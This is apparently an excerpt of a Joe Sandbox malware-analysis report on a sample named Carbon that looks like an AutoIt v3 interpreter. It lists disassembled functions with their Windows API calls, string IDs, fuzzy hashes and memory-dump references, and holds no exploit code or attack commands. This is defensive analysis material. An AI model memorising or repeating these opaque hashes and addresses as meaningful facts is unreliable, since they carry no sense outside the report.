                                                            • Instruction Fuzzy Hash: 87316F721083059FD315EF64D885ABEBBE8FF99350F04092DF585C21A1EB71AA49CB93
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(?,00933902), ref: 0095E1BC
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0095E1CD
                                                            • FindClose.KERNEL32(00000000), ref: 0095E1DD
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirst
                                                            • String ID:
                                                            • API String ID: 48322524-0
                                                            • Opcode ID: 3dd0ccc57aa0ac9379465b71c16e2e1d70999840b245868c96184442731bec4a
                                                            • Instruction ID: 36f2412fccdb4ad335fb8e30c9062658a94629cc4e48a3699fe5d358c81c6efd
                                                            • Opcode Fuzzy Hash: 3dd0ccc57aa0ac9379465b71c16e2e1d70999840b245868c96184442731bec4a
                                                            • Instruction Fuzzy Hash: ECE04F368299106B9214A739EC0D8EA7B9C9A06336F100B15FD75C22E0EB75DE4497D6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,?,0091500E,?,009B98A8,0000000C,00915165,?,00000002,00000000), ref: 00915059
                                                            • TerminateProcess.KERNEL32(00000000,?,0091500E,?,009B98A8,0000000C,00915165,?,00000002,00000000), ref: 00915060
                                                            • ExitProcess.KERNEL32 ref: 00915072
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 6100df3d66d1651d7fbe2ae3b95986534d30f3138c7e3e6269f548ae848bdd83
                                                            • Instruction ID: bb44107f444b6ca4518bc78e79473c20f92555b0d085be06f9bb0c3e977ccb16
                                                            • Opcode Fuzzy Hash: 6100df3d66d1651d7fbe2ae3b95986534d30f3138c7e3e6269f548ae848bdd83
                                                            • Instruction Fuzzy Hash: ACE0EC31115548EFCF217F94DD09B983B6DEF85785F464014F8098A272DB35DE82DB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction ID: 4b3b9c94a0557ea0dfcf66d32ed30c47b309269ee6cdc4f819fead9acaccbf6d
                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction Fuzzy Hash: D531E770B0010ADFC718DF58C490AA9F7AAFF89340B6486A5E409CB656D776EDC1CBD0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                            • API String ID: 0-1645009161
                                                            • Opcode ID: 941465ecbe3102ae6c228f8538f7f68dd8219f44bfa6becd930ce06c4b65cab7
                                                            • Instruction ID: 68240120b02ed91a91f7fd071cf9634c83be58a3ee0c22ccf9f452cd00d9fd98
                                                            • Opcode Fuzzy Hash: 941465ecbe3102ae6c228f8538f7f68dd8219f44bfa6becd930ce06c4b65cab7
                                                            • Instruction Fuzzy Hash: 9681C571A4420DBBDB10AB74DC42FBA7BA8FF55344F048024FA05EA291E775DB81DB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetInputState.USER32 ref: 008FDDA7
                                                            • timeGetTime.WINMM ref: 008FDFA7
                                                            • Sleep.KERNEL32(0000000A), ref: 008FE151
                                                            • Sleep.KERNEL32(0000000A), ref: 0094310C
                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 009431A7
                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 009431BF
                                                            • CloseHandle.KERNEL32(?), ref: 009431D3
                                                            • Sleep.KERNEL32(?,CCCCCCCC,00000000), ref: 0094323F
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Sleep$CloseCodeExitHandleInputObjectProcessSingleStateTimeWaittime
                                                            • String ID:
                                                            • API String ID: 388478766-0
                                                            • Opcode ID: 0f84490cdc6425eeda63feacfbbe1f5d48b0f121fccbd6f2c1d2b7cd9b54def8
                                                            • Instruction ID: ef876bc06025997b55c6ef40b2e09c72151d81dbd80e24a95305815f559b91ee
                                                            • Opcode Fuzzy Hash: 0f84490cdc6425eeda63feacfbbe1f5d48b0f121fccbd6f2c1d2b7cd9b54def8
                                                            • Instruction Fuzzy Hash: 7542D07060834AEFD728CB34C844FBAB7A5FF85304F548519F65AC72A1DB74A984DB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 008F29EF
                                                            • RegisterClassExW.USER32(00000030), ref: 008F2A19
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008F2A2A
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 008F2A47
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008F2A57
                                                            • LoadIconW.USER32(000000A9), ref: 008F2A6D
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008F2A7C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: b270eb3c8571ee06d3db6265813d89fd0c83520d7a2c73a86a0ee2032c2d2a9e
                                                            • Instruction ID: 1819ca0dc3a80b0ca0b97e349bef20c833e4e73df11ceb4f0006ab9b581cb511
                                                            • Opcode Fuzzy Hash: b270eb3c8571ee06d3db6265813d89fd0c83520d7a2c73a86a0ee2032c2d2a9e
                                                            • Instruction Fuzzy Hash: 3721C2B1D2A318AFDB009FA4ED89B9DBBF4FB08710F10411AF611A63A0D7B54544AF95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 009306ED: CreateFileW.KERNEL32(00000000,00000000,?,00930A57,?,?,00000000,?,00930A57,00000000,0000000C), ref: 0093070A
                                                            • GetLastError.KERNEL32 ref: 00930AC2
                                                            • __dosmaperr.LIBCMT ref: 00930AC9
                                                            • GetFileType.KERNEL32(00000000), ref: 00930AD5
                                                            • GetLastError.KERNEL32 ref: 00930ADF
                                                            • __dosmaperr.LIBCMT ref: 00930AE8
                                                            • CloseHandle.KERNEL32(00000000), ref: 00930B08
                                                            • CloseHandle.KERNEL32(?), ref: 00930C52
                                                            • GetLastError.KERNEL32 ref: 00930C84
                                                            • __dosmaperr.LIBCMT ref: 00930C8B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                            • String ID: H
                                                            • API String ID: 4237864984-2852464175
                                                            • Opcode ID: 495310acb1c80cf3f817337aec42a0d31fc7a9e20faecf199ccd0249fa1b7f90
                                                            • Instruction ID: 6e551bfbcbce665b59880f175d7fc3fcf1cb7cb012cf517a58e89f597afb7aad
                                                            • Opcode Fuzzy Hash: 495310acb1c80cf3f817337aec42a0d31fc7a9e20faecf199ccd0249fa1b7f90
                                                            • Instruction Fuzzy Hash: ADA13732A141589FDF19EF68E862BAD7BA4EB86324F14015DF811EB3D2D7358C12CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 008F3DD1: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00932A98,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 008F3DEF
                                                              • Part of subcall function 008F3A75: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 008F3A97
                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 008F3C01
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009339E6
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00933A27
                                                            • RegCloseKey.ADVAPI32(?), ref: 00933A69
                                                            • _wcslen.LIBCMT ref: 00933AD0
                                                            • _wcslen.LIBCMT ref: 00933ADF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                            • API String ID: 98802146-2727554177
                                                            • Opcode ID: efc457431d005183bbfbc23434f19eb4d52e55078356758a5f690fbf768b7cb4
                                                            • Instruction ID: a726ceaa6cbe86d6644bb5b8d4fa0fd8c930472b7bda5316960823bb156fc577
                                                            • Opcode Fuzzy Hash: efc457431d005183bbfbc23434f19eb4d52e55078356758a5f690fbf768b7cb4
                                                            • Instruction Fuzzy Hash: 7E7180719183459AC304EF69EC81DABBBE8FF95350F80852EF545C32A0DB709A49DB52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 008F2876
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 008F2885
                                                            • LoadIconW.USER32(00000063), ref: 008F289B
                                                            • LoadIconW.USER32(000000A4), ref: 008F28AD
                                                            • LoadIconW.USER32(000000A2), ref: 008F28BF
                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008F28D7
                                                            • RegisterClassExW.USER32(?), ref: 008F2928
                                                              • Part of subcall function 008F29BC: GetSysColorBrush.USER32(0000000F), ref: 008F29EF
                                                              • Part of subcall function 008F29BC: RegisterClassExW.USER32(00000030), ref: 008F2A19
                                                              • Part of subcall function 008F29BC: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008F2A2A
                                                              • Part of subcall function 008F29BC: InitCommonControlsEx.COMCTL32(?), ref: 008F2A47
                                                              • Part of subcall function 008F29BC: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008F2A57
                                                              • Part of subcall function 008F29BC: LoadIconW.USER32(000000A9), ref: 008F2A6D
                                                              • Part of subcall function 008F29BC: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008F2A7C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                            • String ID: #$0$AutoIt v3
                                                            • API String ID: 423443420-4155596026
                                                            • Opcode ID: 8f3817a54a1fd8227189c11307554bf906d480ed7ccca1b4d0584481775f91bf
                                                            • Instruction ID: 06e33c06db72a315200777b86099abad993b7870389eebd5931693451d731b66
                                                            • Opcode Fuzzy Hash: 8f3817a54a1fd8227189c11307554bf906d480ed7ccca1b4d0584481775f91bf
                                                            • Instruction Fuzzy Hash: FC21EAB0D39358ABDB10AFA5EC45E997FB4FB48B50F00401AEA04A73A0D7B95540AF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 008F6903: FindCloseChangeNotification.KERNEL32(?,?,?,008F32C7), ref: 008F6923
                                                              • Part of subcall function 008F5E02: CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,008F32FC,?,00008000), ref: 008F5E30
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 008F33E0
                                                            • _wcslen.LIBCMT ref: 008F345F
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 008F353D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$ChangeCloseCreateFileFindNotification_wcslen
                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                            • API String ID: 2701412040-3738523708
                                                            • Opcode ID: 2e5227f02220bb52ef7c2e4f30c736f23643afc0e1307ba6d7e1a70af731d63e
                                                            • Instruction ID: 270b953464b100a062787f41cd7637f9063fd880f68b9da82f5cadcd9ca438ca
                                                            • Opcode Fuzzy Hash: 2e5227f02220bb52ef7c2e4f30c736f23643afc0e1307ba6d7e1a70af731d63e
                                                            • Instruction Fuzzy Hash: 9D126D70508349AFC714EF28C882AAEBBE5FFD5314F00491DF689972A1DB719A49CB53
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • WSAStartup.WS2_32(00000101,?), ref: 00970D43
                                                            • inet_addr.WSOCK32(?), ref: 00970DA3
                                                            • gethostbyname.WS2_32(?), ref: 00970DAF
                                                            • IcmpCreateFile.IPHLPAPI ref: 00970DBD
                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00970E4D
                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00970E6C
                                                            • IcmpCloseHandle.IPHLPAPI(?), ref: 00970F40
                                                            • WSACleanup.WSOCK32 ref: 00970F46
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                            • String ID: Ping
                                                            • API String ID: 1028309954-2246546115
                                                            • Opcode ID: cfb09d61027750dc296ea4c38c2ed778f7866200d890e28089e69a1bfe34f52c
                                                            • Instruction ID: cbb699fd3df5cf4b8a59ea020ec182a9e5e617f5636e45f8652bfe08c7cb0ef4
                                                            • Opcode Fuzzy Hash: cfb09d61027750dc296ea4c38c2ed778f7866200d890e28089e69a1bfe34f52c
                                                            • Instruction Fuzzy Hash: 87916C72608301EFD720DF29C488B16BBE5EF84318F14C999F4698B6A2C774ED45CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,008F2F8C,?,?), ref: 008F2FFA
                                                            • KillTimer.USER32(?,00000001,?,?,?,?,?,008F2F8C,?,?), ref: 008F3026
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008F3049
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,008F2F8C,?,?), ref: 008F3054
                                                            • CreatePopupMenu.USER32 ref: 008F3068
                                                            • PostQuitMessage.USER32(00000000), ref: 008F3089
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                            • String ID: TaskbarCreated
                                                            • API String ID: 129472671-2362178303
                                                            • Opcode ID: 6e4d2345f443d9941b8a650f314d7c698348d43380ab3bda1f00aabc6f452271
                                                            • Instruction ID: 6c4e69a19647862e241005fee1a5aea1fffb5f64d65a127765cf3f2b619d99bb
                                                            • Opcode Fuzzy Hash: 6e4d2345f443d9941b8a650f314d7c698348d43380ab3bda1f00aabc6f452271
                                                            • Instruction Fuzzy Hash: 3F41047062869CABDB385B388C09F793B68F780704F04422AFB42C52E1DF758A40A766
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 008F4385
                                                            • OleUninitialize.OLE32(?,00000000), ref: 008F4424
                                                            • UnregisterHotKey.USER32(?), ref: 008F4609
                                                            • DestroyWindow.USER32(?), ref: 00933D80
                                                            • FreeLibrary.KERNEL32(?), ref: 00933DE5
                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00933E12
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                            • String ID: close all
                                                            • API String ID: 469580280-3243417748
                                                            • Opcode ID: 0a9df95e4195158cb02c6c715849bf237f6d659d2e3fa9e1eef5b0a54a9ab18f
                                                            • Instruction ID: 30c87f15d806db293c5fd94cfb533c024875c398b7fae66b970746df6e509175
                                                            • Opcode Fuzzy Hash: 0a9df95e4195158cb02c6c715849bf237f6d659d2e3fa9e1eef5b0a54a9ab18f
                                                            • Instruction Fuzzy Hash: 69D18E71741216DFCB28EF24C845B6AF7A4FF44714F1182AEE64AAB291CB31AD52CF41
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 273f66b4cb9e0622aae5558bb30ffcec4d7a8efc9404efa5fae78188f7ed3747
                                                            • Instruction ID: bc1d9ebb0f372a3eab6fa16ff31cce84002ea45c3783955238441653e02a5455
                                                            • Opcode Fuzzy Hash: 273f66b4cb9e0622aae5558bb30ffcec4d7a8efc9404efa5fae78188f7ed3747
                                                            • Instruction Fuzzy Hash: 7FC1D470D08269AFDF11DFA9E841BADBBB8FF4A310F184199E414AB3D6C7349941CB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
                                                            • API String ID: 0-4285391669
                                                            • Opcode ID: 7a2f59607a753c9a141f386bd2d0624d99fed125e05a59317b4b70c3f9e5253a
